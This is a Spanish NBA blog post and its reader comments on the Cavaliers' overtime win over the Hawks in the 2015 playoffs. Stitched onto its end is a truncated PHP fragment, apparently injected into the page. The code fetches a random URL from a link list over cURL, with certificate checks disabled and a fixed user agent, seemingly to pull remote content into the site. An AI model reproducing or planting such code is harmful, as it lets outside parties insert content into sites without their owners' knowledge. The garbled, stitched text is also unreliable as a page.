La Crónica: Un esfuerzo titánico

25 de May de 2015 por txusma

Al ritmo que vamos nos vamos a tirar una semana sin NBA. Al igual que los Warriors, los Clevelend Cavaliers también dominan su serie 3-0. Sin embargo, al contrario que los de la bahía, que arrasaron a los Rockets en su propia casa, los Cavs tuvieron que sudar la gota gorda para imponerse a unos Hawks que dieron todo lo que tenían y se sobrepusieron a sus propias dificultades. Todos tenemos en cuenta que ayer los locales jugaban sin Irving, Love ni Varejao pero también hay que considerar que los Hawks lo hicieron sin Korver ni Sefolosha, con Carroll tocado y, toda la segunda parte, sin Al Horford que fue expulsado por una acción con (quién sinó?) Matheew Dellavedova.

Tantas ausencias está convirtiendo la serie en una especie de sufrimiento constante con jugadores exprimidos hasta la saciedad aportando hasta la última gota de sudor disponible. Evidentemente, Lebron James no puede ser ajeno a este esfuerzo colectivo y sabe que si quiere estar de nuevo en la finales ha de dar el 200% de sí mismo y ha de cargar sobre sus espaldas con unos compañeros que parecen dispuestos a morir por él. Anoche, empezó el partido con, posiblemente, el peor cuarto de su carrera deportiva al acumular un 0 de 9 en TC pero no se inmutó. En los 24 minutos siguientes anotó 25 puntos, cogió 9 rebotes y repartió 10 asistencias y los locales le dieron la vuelta al marcador a su rebufo. También ayudó la expulsión del que venía siendo el mejor hombre de los Hawks, Al Horford, tras lanzar un codazo al rostro de Dellavedova. Con Lebron en estado de gracia y sin Horford, parecía que los Hawks no serían capaces de contraatacar una vez más pero en un último esfuerzo desesperado comandado por un enorme Jeff Teague, Atlanta silenció momentáneamente el Quick Loans Arena al ponerse por delante en el marcador. La tuvo el mismo Teague en sus manos pero finalmente se llegó a la prórroga. 

Los jugadores estaban al límite, sobretodo los visitantes que sólo fueron capaces de anotar 4 puntos gracias a los tiros libres hasta que Teague enchufó un triple sobre Tristan Thompson a falta de 55 segundos que ponía a los suyos por delante. Lebron volvió a asumir que era su momento. Tras un rebote ofensivo de Thompson, “King” James anotó un triple desde la esquina y en la posesión siguiente anotaba una entrada a canasta que dejaba a los Cavs 3 puntos arriba. Shelvin Mack intentó hasta en 2 ocasiones anotar el triple (el último completamente solo) que hubiese prolongado la agonía física pero esta vez el balón no quiso entrar.

Nos vamos al 4º partido. Lebron debería hacer el último esfuerzo titánico y cerrar la serie. No se puede permitir volver a Atlanta y arriesgarse a volver a Cleveland con un 2-3 que le exigiría aún más. Mientras él se desangre, los Warriors, con toda la calma del mundo estarán esperándole tranquilamente en la bahía afilando los cuchillos.

Comenta

5 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Que será casualidad lo de Dellavedova… xD

      Citar

  2. Ruxixón dice:
    #2

    Hola Jose Luis…jajajaj.El aussie las pone cachondas,no tiene otra explicación xD

    Como ha mejorado Thompson en defensa,evidentemente en los intercambios para defender a Teague ha sufrido mucho,pero ya no es ese tronco con patas en defensa.

      Citar

  3. Schize dice:
    #3

    Cada vez que miro el boxscore de los Cavaliers flipo más con lo que está haciendo LeBron. Acompañado de medianías, buenos jugadores sin más, está arrasando a un equipo con 4 All Stars, que se dice pronto (cierto es que desde hace tiempo se les ve bastante mal). Increíble que dominante es. Que lástima que me caiga tan mal.

      Citar

  4. Triceratops dice:
    #4

    Scott Skiles, proximo tecnico de los Magic.

      Citar

  5. Ruxixón dice:
    #5

    Triceratops:
    Scott Skiles, proximo tecnico de los Magic.

    Sonaba mucho Thibodeau para el puesto y para someterse a las exigencias a carta descubierta de Chicago -pidiendo una 1ª ronda cuando hasta la vecina del 4ºB sabe que en los Bulls no cuentan con Thibs- mejor ir a un por un entrenador del mismo rango.De fama duro y exigente con sus jugadores,y sobre todo de un marcado perfil defensivo que es lo que pide vuestro equipo con Oladipo,Payton y Aaron Gordon.Me suena que no es un entrenador que suela caer bien,no obstante lo que yo le recuerdo es haber lidiado en Milwaukee con aquel Monta Ellis y Jennings,algo que no debe ser sencillo.Tobias Harris no jugó casi nada con él,aunque por aquel entonces no era el jugador que es hoy día,no creo que deba haber problemas en el sentido de que Harris no quiera renovar con Skiles al frente.Además ex-jugador de Orlando que eso se lleva mucho por allí,entrenadores que conozcan la organización de su época de jugador.

    En resumen,no es un nombre de mucha pompa pero es lo que necesitáis ahora,por tanto me gusta.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>